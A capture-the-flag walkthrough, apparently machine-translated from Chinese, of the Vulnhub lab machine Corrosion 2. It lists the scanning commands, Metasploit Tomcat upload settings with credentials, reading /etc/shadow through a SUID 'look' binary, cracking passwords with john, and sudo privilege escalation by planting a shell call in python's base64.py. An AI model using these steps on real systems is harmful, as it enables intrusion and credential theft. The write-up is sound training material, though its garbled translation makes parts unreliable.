Vulnhub target machine Corrosion: 2 penetration test detailed explanation
Vulnhub target drone introduction:
Vulnhub is a comprehensive shooting range that provides a variety of vulnerability platforms. It can be downloaded from a variety of virtual machines, and the local VM can be opened. It is like playing a game to complete interesting combats such as penetration testing, privilege escalation, vulnerability exploitation, and code auditing.
This is a vulnerability target drone, just need to find the flag as usual.
Difficulty: Medium
Vulnhub target machine download:
Official website download: https://download.vulnhub.com/corrosion/Corrosion2.ova
Vulnhub target machine installation:
After downloading, unzip the installation package and use it VMwareto open it.
Detailed Explanation of Vulnhub Target Machine Vulnerabilities:
①: Information collection:
kaliuse arp-scan -lor netdiscoverdiscover hosts
Use the command:
nmap -sS -sV -T4 -n -p- 192.168.0.100
Infiltration machine: kali IP: 192.168.0.104 Target machine IP: 192.168.0.100
22、80、8080The port is turned on , the service 8080is turned on, and the old access port ( default page) is scanned: etc.tomcat80Apachedirb、dirsearch、whatweb、gobuster、nikto
dirsearch -u http://192.168.0.100 #没有可以利用的信息(一般没有可以利用信息就扫二级目录)
dirsearch -u http://192.168.0.100:8080 #这波信息收集得到了backup.zip和readme.txt文件
gobuster dir -u http://192.168.0.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip #没有可以利用的信息
gobuster dir -u http://192.168.0.100:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip -b 400,404
whatweb
Get an account: randyDownload and backup.zipfind that you need a password to try to blast and Corrosion1get the same password:@administrator_hi5
You can refer to Corrosionthe first article of the series for detailed methods: http://t.csdn.cn/XmjAR
Check the configuration file tomcat-users.xmland find two sets of account passwords: manager/melehifokivaiand admin/melehifokivaitry to log in, and the login is successful!
②: Tomcat msf upload vulnerability to get the shell:
Open msfconsolethe console to use the module: use exploit/multi/http/tomcat_mgr_uploadset parameters
set RHOST 192.168.0.100
set HttpPassword melehifokivai
set HttpUsername manager
set RPORT 80
run
Switch Shell,the following three users in the home jayewithout permission to enter randythe user to view user.txtand get the first one flag!
Try to switch jayeusers, try tomcatthe password to enter the magic! Use pythonget terminal:python3 -c 'import pty;pty.spawn("/bin/bash")'
cat /etc/passwdIf it is found, sshthen we will switch to sshlogin to make the operation more convenient!
Use the command to view rootexecutable commands:find / -perm -u=s -type f 2>/dev/null
③: look unauthorized operation:
Here I found a lookcommand that can be used (the first time I use it, no ~) I can’t see ./look '' "$LFILE"the file name that I don’t have permission to run and view.
lookHow to use unauthorized commands: https://gtfobins.github.io/gtfobins/look/
In fact, you can directly use this unauthorized command to view rootthe file here. ./look '' /root/root.txt
View /etc/shadowand /ect/passwdfile, unshadowthe command generates all the passwords that need to be cracked and then johnblasts them
(you must copy all the contents of the two files or they will not come out). The dictionary is: rockyou.txt(It takes a long time!! )
unshadow passwd shadow > pass.txt
john --wordlist=/usr/share/wordlists/rockyou.txt passwd.txt
The password obtained randyis:07051986randy
④: sudo executes Base64.py privilege escalation
After a successful login, a wave of information collection: found that this script id,whoami,sudo-lcan be executedrandombase64py
We directly write in the pythonprogram base64module, shellfirst find this script and then use it vior launch it nanowith the editor ctrl+X(it took a long time to use it for the first time)
cd /usr/lib/python3.8
ls -al base* #找到base64.py 写入下面得内容
import os
os.system("bin/bash")
sudo /usr/bin/python3.8 /home/randy/randombase64.py #运行即可 因为使用得是pyton3.8 也可以尝试别的成功即可!!
⑤: Get LFAGL:
So far, the flag has been obtained, and the penetration of this article is over. Thank you for watching! !
Vulnhub target penetration summary:
The difficulty of this target machine is above the middle level because it is more troublesome
1. Information collection arp-scan -lObtain ip address and port information webscanning tool: nikto,dirb,dirbuster,whatweb,ffufwait to view F12source code information
2. MSF exploit/multi/http/tomcat_mgr_uploadModule getshell(you need to know the account password)
3. zip2johnBlasting and fcrackzip(blasting compression package tool) and johnerror resolution Method look./look '' 文件名即可sudo 提权执行base64.pyshell( new knowledge point!) 4. Command to read files beyond authority Let’s not demonstrate it first, you can understand it)
Linux PolkitCVE-2021-4034
CorrosionThe series is over. It’s been a very rewarding day after learning a lot of knowledge points (Yeah!) The
final creation is not easy, I hope it can be helpful to everyone. If you like it, please give me a one-click triple link. Your happiness is my greatest happiness. ! !